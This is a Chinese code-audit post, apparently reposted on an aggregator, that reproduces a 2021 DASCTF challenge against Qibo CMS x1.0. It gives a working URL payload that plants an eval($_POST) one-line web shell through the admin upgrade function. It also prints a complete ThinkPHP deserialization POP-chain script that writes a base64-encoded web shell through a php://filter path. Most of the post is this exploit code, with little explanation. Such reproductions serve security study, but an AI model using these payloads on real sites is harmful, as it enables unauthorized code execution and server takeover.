[代码审计]齐博建站系统x1.0企业版代码审计

Posted Y4tacker

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[代码审计]齐博建站系统x1.0企业版代码审计相关的知识,希望对你有一定的参考价值。

写在前面

复现2021 DASCTF July X CBCTF 4th赛题

齐博建站系统x1.0后台存在命令执行漏洞

漏洞点在于application/admin/controller/Upgrade.php下的sysup函数

跟入writelog,很有趣没有过滤进行直接拼接

写入的是php文件有点傻

因此我们直接访问

http://yyds.top/admin.php/admin/upgrade/sysup.html?upgrade_edition=%22,%22%22=%3E-eval($_POST[%27yyds%27])-%22,];?%3E// 

即可在runtime/client_upgrade_edition.php生成一句话木马

齐博建站系统x1.0企业版前台反序列化漏洞

application/index/controller/Labelmodels.php下的get_label方法

传个数组进去就行了,网上也有这个版本poc,当然肯定还有其他更好用的,懂得都懂

<?php
namespace think\\process\\pipes {
    class Windows {
        private $files = [];

        public function __construct($files)
        {
            $this->files = [$files]; //$file => /think/Model的子类new Pivot(); Model是抽象类
        }
    }
}

namespace think {
    abstract class Model{
        protected $append = [];
        protected $error = null;
        public $parent;

        function __construct($output, $modelRelation)
        {
            $this->parent = $output;  //$this->parent=> think\\console\\Output;
            $this->append = array("xxx"=>"getError");     //调用getError 返回this->error
            $this->error = $modelRelation;               // $this->error 要为 relation类的子类,并且也是OnetoOne类的子类==>>HasOne
        }
    }
}

namespace think\\model{
    use think\\Model;
    class Pivot extends Model{
        function __construct($output, $modelRelation)
        {
            parent::__construct($output, $modelRelation);
        }
    }
}

namespace think\\model\\relation{
    class HasOne extends OneToOne {

    }
}
namespace think\\model\\relation {
    abstract class OneToOne
    {
        protected $selfRelation;
        protected $bindAttr = [];
        protected $query;
        function __construct($query)
        {
            $this->selfRelation = 0;
            $this->query = $query;    //$query指向Query
            $this->bindAttr = ['xxx'];// $value值,作为call函数引用的第二变量
        }
    }
}

namespace think\\db {
    class Query {
        protected $model;

        function __construct($model)
        {
            $this->model = $model; //$this->model=> think\\console\\Output;
        }
    }
}
namespace think\\console{
    class Output{
        private $handle;
        protected $styles;
        function __construct($handle)
        {
            $this->styles = ['getAttr'];
            $this->handle =$handle; //$handle->think\\session\\driver\\Memcached
        }

    }
}
namespace think\\session\\driver {
    class Memcached
    {
        protected $handler;

        function __construct($handle)
        {
            $this->handler = $handle; //$handle->think\\cache\\driver\\File
        }
    }
}

namespace think\\cache\\driver {
    class File
    {
        protected $options=null;
        protected $tag;

        function __construct(){
            $this->options=[
                'expire' => 3600,
                'cache_subdir' => false,
                'prefix' => '',
                'path'  => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php',
                'data_compress' => false,
            ];
            $this->tag = 'xxx';
        }

    }
}

namespace {
    $Memcached = new think\\session\\driver\\Memcached(new \\think\\cache\\driver\\File());
    $Output = new think\\console\\Output($Memcached);
    $model = new think\\db\\Query($Output);
    $HasOne = new think\\model\\relation\\HasOne($model);
    $window = new think\\process\\pipes\\Windows(new think\\model\\Pivot($Output,$HasOne));
    echo urlencode(serialize($window));

}

以上是关于[代码审计]齐博建站系统x1.0企业版代码审计的主要内容,如果未能解决你的问题,请参考以下文章

代码审计之XiaoCms

三大付费版代码审计工具对比分析

espcms代码审计

[代码审计]蝉知企业门户系统v7.7存在命令执行漏洞

PHP代码审计之入门实战

代码审计利器-Seay源代码审计系统